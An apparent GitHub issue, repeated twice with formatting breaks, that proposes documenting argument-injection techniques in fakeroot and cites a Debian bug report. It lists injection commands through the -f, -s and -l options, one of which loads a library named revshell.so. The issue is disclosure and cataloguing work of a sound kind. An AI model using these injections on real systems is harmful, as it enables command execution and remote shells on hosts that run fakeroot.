Open cosad3s opened 9 months ago
Reported on: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1054396
This package is present in lot of environments.
fakeroot -f "touch /tmp/pwnd"
fakeroot -s "id"
FAKEROOTKEY
id
fakeroot -l /tmp/revshell.so
(Other fakeroot forks / variations are probably subjects to these injections.)
Thank you! I'll keep it open for now, and merge it once I find a CVE or a write-up of an argument injection on fakeroot.
fakeroot
Reported on: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1054396
This package is present in lot of environments.
fakeroot -f "touch /tmp/pwnd"
orfakeroot -s "id"
(the env variableFAKEROOTKEY
will hold the result ofid
)fakeroot -l /tmp/revshell.so
(Other fakeroot forks / variations are probably subjects to these injections.)